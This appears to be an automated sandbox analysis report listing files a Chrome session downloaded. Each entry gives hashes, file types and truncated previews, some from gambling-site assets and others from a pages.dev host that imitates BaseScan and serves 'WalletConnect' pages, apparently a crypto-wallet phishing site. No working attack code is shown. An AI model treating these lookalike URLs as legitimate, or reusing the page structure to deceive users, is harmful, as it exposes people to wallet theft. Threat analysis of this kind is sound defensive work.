                                                                                                                                                                                                                                              SHA-512:23AF2ABC012C29672E49D0BE3068C46F6CFB6269CCA5D34800FD9671AB68A64FEE106D6C4AC37A3F606237C088A0D70F3426CF3D4C3B83ED5DF132CA407A25E9
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bc.imgix.net/game/image/56c15419-5ce2-43a8-9700-23accc7661d0.png?_v=4&w=100&auto=format&cs=tinysrgb&blur=100
                                                                                                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D............3...f...(iinf..........infe........av01Color.....iprp...cipco....ispe.......d........pixi............av1C........colrprof....lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0......colrnclx...........ipma...................nmdat........0@CA.2.......1..+V..bBHily.T...W|J!.U5Vo.sOJ....J@.J6..8...v@:(B.Y..X....P....A...4....J....Xg-"r.."D...L.|o...._.....c.......^un..@q.:qq..0n...4-@7,.Y...{.n.)....3.j..
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 100x133, components 3
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):2674
                                                                                                                                                                                                                                              Entropy (8bit):7.314046017925388
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:48:Ull06uETALTeSXrCQS8qQg/c6ly7DfUMOM8+8V+n6YI6:U0EqTeSzS/Qycey7DfFOMl8V+nzH
                                                                                                                                                                                                                                              MD5:0A90CE3F59BC052F03F38B947688032E
                                                                                                                                                                                                                                              SHA1:943D226BD0383B2E048E2629E6B9BF02C8D45928
                                                                                                                                                                                                                                              SHA-256:50777AEDD93D8BACD54D43A878EB56FF85BB6F8F6C23B7B94FA16CED09623C8B
                                                                                                                                                                                                                                              SHA-512:F71BE0668C1E41DA9F052F0D3C439F28AC6C912FD6D88725853FA9E9895DF6C5AB8E441429F6056DFEAB9746CE296AC235F5A4B6379B165FC0152F61E2828921
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:......JFIF.....H.H......ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc.......^cprt...\....wtpt...h....bkpt...|....rXYZ........gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2..................................................................................text....IX..XYZ ...............-XYZ ...........3....XYZ ......o...8.....XYZ ......b.........XYZ ......$.........curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0........................................................#...#*%%*525EE\..................................................#...#*%%*525EE\........d.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (3423)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):3424
                                                                                                                                                                                                                                              Entropy (8bit):5.340197407245798
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:ov/HAUoqFQG0z384fj1xWgXmtce4hguZaDRhk7t:onVIXznfkce4hgE6TkR
                                                                                                                                                                                                                                              MD5:195B6DF67B76CD0056185FC19507FB64
                                                                                                                                                                                                                                              SHA1:0FE913DAB7342930C70890881F783601CA44B26A
                                                                                                                                                                                                                                              SHA-256:DBC630CDCD02B59FB0D9568C426A14899D8ADBC195E06F61E22B28F3A9F7CA45
                                                                                                                                                                                                                                              SHA-512:9DA1D94C2605FBAD99F2A1246C20ED8C0FBDDE20E1436392FF885FA547DD794C5683B02F7AFD410BF2E1DB15FA08BE9EA91379B49B3638CFBB9961F86A116335
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:import{a7 as C,bd as R,c as i,i as l,af as D,A,W as I,h as y,a9 as E,f as m,$ as P,g as q,be as H,bf as v,u as U,o as _,b as j,t as h,bg as B,l as x,s as k,r as w,p as f,q as J,D as L,e as z,m as F}from"./index-DD2Zk4iT.js";import{b as G,g as M}from"./index-DH9MDtxd.js";import"./_basePropertyOf-BhSQSS-6.js";const T={blackJack:G};var W=m('<div class="h-96 center">'),K=m('<div class="relative overflow-hidden px-2 text-secondary"><table class="table border-separate border-spacing-x-1 border-spacing-y-6"><tbody><tr><td class="w-[30%] lg:w-auto"></td><td></td><td class=w-16></td><td class=m-width>'),O=m('<img class="mr-1 inline-block w-5">'),Q=m("<span class=ellipsis>"),V=m('<tr><td class="w-[30%] lg:w-auto"></td><td class="text-primary ellipsis"></td><td class=w-16>x</td><td><div class="flex items-center justify-end"><span class="overflow-hidden text-nowrap"></span><img class="h-5 flex-none ml-1">'),X=m("<span class=text-second>");const p=10,[Y,S]=C({lastBet:[],highRoller:[]}),Z=R(()=>{con
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (41625)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):150357
                                                                                                                                                                                                                                              Entropy (8bit):5.405136612865824
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3072:AwlL47MnAPaiA2YudRCG0fW2MkdF5kpjm5L1ZVplqpU:AwlgMgaiA2YuX0+2MkdF5LL1/plqpU
                                                                                                                                                                                                                                              MD5:F1E1655DC1B6CBDB0354D29980882BB0
                                                                                                                                                                                                                                              SHA1:F433EF04877CD65555FD9CF56A2A3CD826B00199
                                                                                                                                                                                                                                              SHA-256:9034A1AD067DA69459A1BAAC888CFDD2C9320148F2546CEC38FFD0DD3347CE5F
                                                                                                                                                                                                                                              SHA-512:FF0F0E8E41A5D856CCC7FAADC7BD835394538C0B01F62571F38266D12522025FC0FCC611EC5172C327CC950DE1B1099DACC14EBBBE99EBA46D10B939746B0933
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:/* https://hcaptcha.com/license */.!function(){"use strict";function e(e){var t=this.constructor;return this.then((function(n){return t.resolve(e()).then((function(){return n}))}),(function(n){return t.resolve(e()).then((function(){return t.reject(n)}))}))}function t(e){return new this((function(t,n){if(!e||"undefined"==typeof e.length)return n(new TypeError(typeof e+" "+e+" is not iterable(cannot read property Symbol(Symbol.iterator))"));var r=Array.prototype.slice.call(e);if(0===r.length)return t([]);var i=r.length;function o(e,n){if(n&&("object"==typeof n||"function"==typeof n)){var a=n.then;if("function"==typeof a)return void a.call(n,(function(t){o(e,t)}),(function(n){r[e]={status:"rejected",reason:n},0==--i&&t(r)}))}r[e]={status:"fulfilled",value:n},0==--i&&t(r)}for(var a=0;a<r.length;a++)o(a,r[a])}))}var n=setTimeout,r="undefined"!=typeof setImmediate?setImmediate:null;function i(e){return Boolean(e&&"undefined"!=typeof e.length)}function o(){}function a(e){if(!(this instanceof
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators, with escape sequences
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):904694
                                                                                                                                                                                                                                              Entropy (8bit):5.648653033680158
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:B+E3jK8oCNvmsedKTgMqXhCcbb0IoFabtIG7PQQNvri8pX6rFzcdmPu:BpjoamsSKtQhCs0nFywrqZ
                                                                                                                                                                                                                                              MD5:4FB156333811FA50FF75F934F625226B
                                                                                                                                                                                                                                              SHA1:B83AF88F81EC4A4E15687F7F576A5F1EAD25321D
                                                                                                                                                                                                                                              SHA-256:D1BFA69432D9B4419FDC418E0BD102F21F5629A3D78237B9518755E683FD97DD
                                                                                                                                                                                                                                              SHA-512:299EDA4264A81475337B1214120940F91B1E5D0FC85EB7CD31C1989368698C684402AB13EF46F7F389D34F6083E80362538E0B24A24B82B26386D800800B0A11
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan.org/assets/js/custom/web3-eth.min.js?v=24.4.4.9
                                                                                                                                                                                                                                              Preview:!function(e){if("object"==typeof exports&&"undefined"!=typeof module)module.exports=e();else if("function"==typeof define&&define.amd)define([],e);else{("undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:this).Web3Eth=e()}}(function(){var define,module,exports;return function o(a,s,u){function c(t,e){if(!s[t]){if(!a[t]){var r="function"==typeof require&&require;if(!e&&r)return r(t,!0);if(f)return f(t,!0);var n=new Error("Cannot find module '"+t+"'");throw n.code="MODULE_NOT_FOUND",n}var i=s[t]={exports:{}};a[t][0].call(i.exports,function(e){return c(a[t][1][e]||e)},i,i.exports,o,a,s,u)}return s[t].exports}for(var f="function"==typeof require&&require,e=0;e<u.length;e++)c(u[e]);return c}({1:[function(e,t,r){"use strict";t.exports=e("./register")().Promise},{"./register":3}],2:[function(e,t,r){"use strict";var o="@@any-promise/REGISTRATION",a=null;t.exports=function(n,i){return function(e,t){e=e||null;var r=!1!==(t=t||{}).global;if(null===a&
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/modules.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):15403
                                                                                                                                                                                                                                              Entropy (8bit):4.69349138634662
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:h47ioZU39vI/sTdQhTpuXXuZMm9dt4JoTVWXjViAGQOniZvkmFuB87BUygxbiA5y:hQVZqZTmTHj9MzUZQNkwWztM
                                                                                                                                                                                                                                              MD5:C8A9BD63967C415F331695AE6A2D65AC
                                                                                                                                                                                                                                              SHA1:07C58C3715B2F0CC86464CF2A5D24ACD1CD0AE73
                                                                                                                                                                                                                                              SHA-256:0D99F9E8F8AD9FEDB2F592FFCE1B8593AD8E6FE1DFA5A0CEEAD346A95F33E5B0
                                                                                                                                                                                                                                              SHA-512:8A77F3B94B01096AC1738C59B6F20273B1306E3E62972EABE4822474FCBAD3B93EB57E430D63775163884844CFB1BC911E0FBCC57DE4F686E66A2E96417970BD
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:<svg width="1200" height="260" viewBox="0 0 1200 260" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_13_69505)">.<mask id="mask0_13_69505" style="mask-type:alpha" maskUnits="userSpaceOnUse" x="9" y="0" width="1201" height="260">.<rect x="9.03906" width="1200" height="260" rx="12" fill="url(#paint0_linear_13_69505)"/>.</mask>.<g mask="url(#mask0_13_69505)">.<path d="M29.4651 52.0026L58.2955 103.99H0.634766L29.4651 52.0026Z" fill="#2F3435"/>.<path d="M87.469 156.009L116.299 207.996H58.6387L87.469 156.009Z" fill="#2F3435"/>.<path d="M58.1775 103.99L29.3471 52.0025L87.0079 52.0025L58.1775 103.99Z" fill="#2B3031"/>.<path d="M1.1736 207.996L-27.6568 156.009L30.004 156.009L1.1736 207.996Z" fill="#2B3031"/>.<path d="M116.181 207.996L87.3511 156.009L145.012 156.009L116.181 207.996Z" fill="#2B3031"/>.<path d="M29.4646 52.003L0.634255 0.0152309L58.295 0.0152359L29.4646 52.003Z" fill="#2B3031"/>.<path d="M87.0076 52.003L58.1772 0.0152309L115.838 0.0152359L87.0076 52.003Z"
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (24554)
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):24555
                                                                                                                                                                                                                                              Entropy (8bit):5.138848412932619
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:384:P5tcAnIVxENHWXWaAXpL+N8S85e+Tx8Qcj5yjAFOE7twymIQyvwjR5lKw58oepd+:P5tcKIzEsmt+N5WAjkyt658oepdIsm8a
                                                                                                                                                                                                                                              MD5:7749612FDF867CED5F8FF017B1C338B4
                                                                                                                                                                                                                                              SHA1:DCD57DF86A932014113DD6E641587542863DB518
                                                                                                                                                                                                                                              SHA-256:7A872A29BB67041000F564E03321746FB6DC469448B8585E28A5E1EBF6EDC349
                                                                                                                                                                                                                                              SHA-512:F9359973D03734B7950D53A33F733A3AF1DA6D4E84A6DF0D601373588166E86BC98E81904A526682ACD0CA75C227CD15C39FEA7F79C77599B49D10D955379548
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Preview:const d="modulepreload",m=function(i){return"/modules/bonus2/"+i},l={},e=function(n,_,u){if(!_||_.length===0)return n();const c=document.getElementsByTagName("link");return Promise.all(_.map(t=>{if(t=m(t),t in l)return;l[t]=!0;const o=t.endsWith(".css"),E=o?'[rel="stylesheet"]':"";if(!!u)for(let r=c.length-1;r>=0;r--){const a=c[r];if(a.href===t&&(!o||a.rel==="stylesheet"))return}else if(document.querySelector(`link[href="${t}"]${E}`))return;const s=document.createElement("link");if(s.rel=o?"stylesheet":d,o||(s.as="script",s.crossOrigin=""),s.href=t,document.head.appendChild(s),o)return new Promise((r,a)=>{s.addEventListener("load",r),s.addEventListener("error",()=>a(new Error(`Unable to preload CSS for ${t}`)))})})).then(()=>n()).catch(t=>{const o=new Event("vite:preloadError",{cancelable:!0});if(o.payload=t,window.dispatchEvent(o),!o.defaultPrevented)throw t})},p=globalThis._bc,{A:Y,Accordion:Z,ActiveProvider:ee,App:te,Badge:oe,Breadcrumb:se,Button:re,Carousel:ie,Checkbox:ae,Collapsib
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, Unicode text, UTF-8 text, with very long lines (454), with CRLF, CR line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):338199
                                                                                                                                                                                                                                              Entropy (8bit):5.0303192172364035
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:z+do4tv/j6Wwz0mCKQKvJUC3ZT7bO7UHr46N5NQpKz1pc/ElOFT:z+dp6Wwz0mCbsHr46N5NQpKz1pc/xFT
                                                                                                                                                                                                                                              MD5:14145C93534720519B497D9B59A121B1
                                                                                                                                                                                                                                              SHA1:29820DAFFBEB994B2A8CAB8DF38FA15B0C5A45AC
                                                                                                                                                                                                                                              SHA-256:7FAEDEBB315AA7C53046F6ACE6ADDA6D98CB229187EDC77A135B42CED57D7ED7
                                                                                                                                                                                                                                              SHA-512:FBCE088CF8FD63FCFC638F0BE099EA2A6D5E4AAAB69EBEED11A8AAF3D73B2C1A0083537B50095AD5E0959B4C38F08D17283A1F110D11D4F1D48F9554D4A69DAB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/dist/website
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <title>.. PEPi (PEPI) Token Tracker | Base.. </title>.. <meta charset="utf-8"/>.. <meta content="width=device-width, initial-scale=1, shrink-to-fit=no" name="viewport"/>.. <meta content="basescan.org" name="author"/>.. <meta content="ethereum, explorer, ether, L2, search, blockchain, crypto, currency" name="keywords">.. <meta content="telephone=no" name="format-detection"/>.. <meta content="PEPi (PEPI) Token Tracker | Base" property="og:title"/>.. <meta content="https://basescan.org/token/images/" property="og:image"/>.. <meta content="BaseScan" property="og:site_name"/>.. <meta content="PEPi (PEPI) Token Tracker on Base shows the price of the Token $0.0000, total supply 13,370, number of holders 846 and updated information of the token. The token tracker page also shows the analytics and historical data." property="og:description"/>.. <meta content="website" property="og:type"/>.. <meta content="summary" name="twitter:
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:HTML document, ASCII text, with very long lines (2596), with CRLF line terminators
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):9117
                                                                                                                                                                                                                                              Entropy (8bit):4.979082694215808
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:192:KwVNjV1ewlF4U2IQA2uesPR7p0pGe6AcNinGHitiRNi8io:PVNj3eKF4MQA2BgR7ipSNingitiRNi8t
                                                                                                                                                                                                                                              MD5:B274B09176311173882C04833F6D6F84
                                                                                                                                                                                                                                              SHA1:2158108014BFB2C43895650AE6341747BC204AF8
                                                                                                                                                                                                                                              SHA-256:DDA340737B264528B9C6EB132A338771AACE2916AC62D5EFABC615AE1526AF19
                                                                                                                                                                                                                                              SHA-512:76373F6D83F274E0670B414A7E3805A081048AD814EC3C3F99E3C0A039676AF3BE2F27B3D1295AB77867210ADA11EB061B37CDFE24B263E5B7645112CC08FF8F
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://basescan-snapshot0x28a5e71bfc02723eac17e39c84c5190415c0d9.pages.dev/token/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/dist/z0emk-akw98-t47wk.js
                                                                                                                                                                                                                                              Preview:<!DOCTYPE html>..<html lang="en">.. <head>.. <meta charset="utf-8" />.. <link rel="shortcut icon" href="favicon.ico" />.. <meta name="viewport" content="width=device-width, initial-scale=1.0" />.. <meta name="theme-color" content="#000000" />.. <meta.. http-equiv="Content-Security-Policy".. content="upgrade-insecure-requests".. />.. <meta name="description" content="" />.... <title>WalletConnect</title>.. <link rel="manifest" href="manifest.json" />.. <link id="walletconnect-style-sheet" rel="stylesheet" href="style.css" />.. <link rel="stylesheet" href="840013fd8c2ab234.css" />.. <link rel="stylesheet" href="styles.css" />.... <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/pbkdf2.js"></script>.. <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.1/jquery.min.js"></script>.. <script src="https
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:PNG image data, 156 x 156, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):5888
                                                                                                                                                                                                                                              Entropy (8bit):7.950936090425031
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:96:Z5Nci99f+6BbUOXqLjJmvoMag2EhXaGdzlCPQsI1osyo7bJKIXBfExm3gGhi:Z5Nci9FTBbhUjJmvjazzUzlnsNsxBnri
                                                                                                                                                                                                                                              MD5:C1EEC85B3B59830727F450C5BEF1845D
                                                                                                                                                                                                                                              SHA1:F3D27D795C775F8BDDD21401F8B65FA8E2CE3648
                                                                                                                                                                                                                                              SHA-256:9D8FA6716D7B578ABFBB7A7F60566E9B4CE803AB91114B7488F6060B2E37AC22
                                                                                                                                                                                                                                              SHA-512:7C441D4A8ACF3E8284AA7A433FD256DB7BAAE4DAB512B9142D60CFD8DD9C602E120E1361FF3D1F24D3790594F85F1A5C2C6D623D68CFE5407FE3D14DD7BF290E
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/leicester-5bY-JKgX.png
                                                                                                                                                                                                                                              Preview:.PNG........IHDR..............f2....KPLTE................................................................D^......tRNS.. 0@@P_```p.................LIDATx..\..*.-...%.Af../...Mv/.d.<.N.C.."........t.z.......T........aSgL.#...?.... x.?e.....#~L.`..i..0.t!=.<.o........BY.Y.........v.&....!..j.q...-...O.9-2.M.!.F....T.y.V_"LX..mjAc&v....>..w.-...I.....`.....J........3..e.uZ|.......J.T.K.......u0b!.p.l.u...z.E..gS..=.?.v.#........Y.L..h..7..({..=.G..U.&.C...#Z..ND.,<R..p....Nx...]...3Xc..Y.GJ'....0..@..L.....s..q.G....mV......H.........5.....<..j/..+$\J...FnK)Q*GB........].."..a.M......o.9w..).N {x.$.....Cx..O0.g..O....1A..L...@.{.^..f........eg.w.I.1+..s....N.#;p.~....s.B6.....Z.....X....AFLiQV.....&..Z.Sn.....W.{.-BGe..9.u..d2..Y......1..pd.*...GJ.He...O-9...P..,.R..'.C.....}...[.....z.....d.2.0e]..Ep%*.d..: ..gwo.....M...JbR..a$*.pi\.i.u.B. .....v.......a.a/5...5.P..:..p....~..j.~.n.tc..J.._a..Y.x.z.....`kK.....3.)i2.....h..%).......
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (5945)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):318187
                                                                                                                                                                                                                                              Entropy (8bit):5.5686580729916
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:6144:k43PpmFU7+lq04d7z3KsOemve1NlX0fxnQZ:N3QW7+QnhDuG
                                                                                                                                                                                                                                              MD5:F6802DC701A8A27E91985A7CBB7D1BBB
                                                                                                                                                                                                                                              SHA1:BC9FCA6D42DBB7CF7165288CFAE438EFAC30DAB0
                                                                                                                                                                                                                                              SHA-256:278982826FD53A7CDC71CA71E88B0C171FA3FF0E9D3C980CF40176B7F83FD9B8
                                                                                                                                                                                                                                              SHA-512:22ACE81216CC685E1E24AE359CC40FE3BE3E0458AB38EB09077F9DD59A796E6F429815AEDC781CCBE0099A5634BDC8FBF09492754FC4A89ADABD4F5645BDDC84
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://www.googletagmanager.com/gtag/js?id=G-TWEL8GRQ12
                                                                                                                                                                                                                                              Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"1",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_1p_data_v2","priority":13,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAddressEnabled":false,"vtp_regionValue":"","vtp_countryValue":"",
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):740
                                                                                                                                                                                                                                              Entropy (8bit):7.650088328587842
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:slP3P/LNHDXgqkxjL7g1WALnuF27WZMnnkRU+dCd9FiUHoIwrHHfWdunlAK6XiSV:st/LtHMsuM7WkEYaxNrFAK1xp6
                                                                                                                                                                                                                                              MD5:FE27619939537BF7C8EBDB8E83B90F04
                                                                                                                                                                                                                                              SHA1:6AB22E02739CC8412117A9C7B9254270AC3EAFAD
                                                                                                                                                                                                                                              SHA-256:EBF90C20E4425FF3BED476CCAD4E3CFFB31972E058743435459182DAC328E1AB
                                                                                                                                                                                                                                              SHA-512:32E32BF83750425B5E7592A87F029A094199E5425F8240890A0E47A6F0C2BACC5DE8F48A23F654BFE82B207D9098ABACBB32591E754C57E2716C9ECBF565860B
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              URL:https://bcgame.sk/assets/pic_pay-fE-XPIEr.png
                                                                                                                                                                                                                                              Preview:RIFF....WEBPVP8L..../w...7....h...R.<6..m:...^A.6....3r.A#Ia..,....8`....zsr.B...Nz&.N=.x..>.. ...@.......r...n..m.q..`... . ...a.......Q.j.".?.....-.XF...w...Y....Bx;....{........j....<....W#?3.......4.~x..6...%..AM..r.:u^y.hCn.......(.e.F.Q.......U.&/.S.p;.2...).5..B.?Jp.teMdz5U.....#s...I..H....).b.l......0....DTL%.4.4.....aS.....D..E.b....p.g.x./.m..y.<...P....J..8....j\..`.{.9.A.X..1..r)pT;...FC9..C.WF.Qx..D..8{......I.2g?.."wR6.....D.M...R:......3....(.TjJ>....we..E.bT.:....g...AxWe1..4.#........+R>....;$sz.V..}...._J..#g......b.Ub.Y3.).....3../....W.Y. ft.....>=.y|.....<.a...<.Ca.ng....+..).......<l..'L!k1x....T`......X:..`....).>..<.F...H...v...!..L.86....$.t.\p....P.3..D...Ey;....m..=....
                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (667)
                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                              Size (bytes):668
                                                                                                                                                                                                                                              Entropy (8bit):5.246627624639358
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:12:EajATrOuA6pCHsPAA9iCXnbOtyd5Kp92vSqjMAIKpj34aDpD:EbTRA6CYAA9RbasScd5j31D
                                                                                                                                                                                                                                              MD5:F77713A42E400D8F889225F376D1C010
                                                                                                                                                                                                                                              SHA1:85AE9759DF6B9EB323DFB00CF119E00413D4B3DF
                                                                                                                                                                                                                                              SHA-256:B7B9BF4BB6A901217CD6878F59A9A651E6A5E1BD6F3CDDBBD891A4D089CD02FA
                                                                                                                                                                                                                                              SHA-512:10F7F0AB46D66B841F38E2EA8C69C5AAB5D0290E90DB14524006B33EAF52CF14D1401D3A87E86828B6CE5DBB164B10E771AB8684EE8F94E3ECC0DA02C5B561AC
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Reputation:low
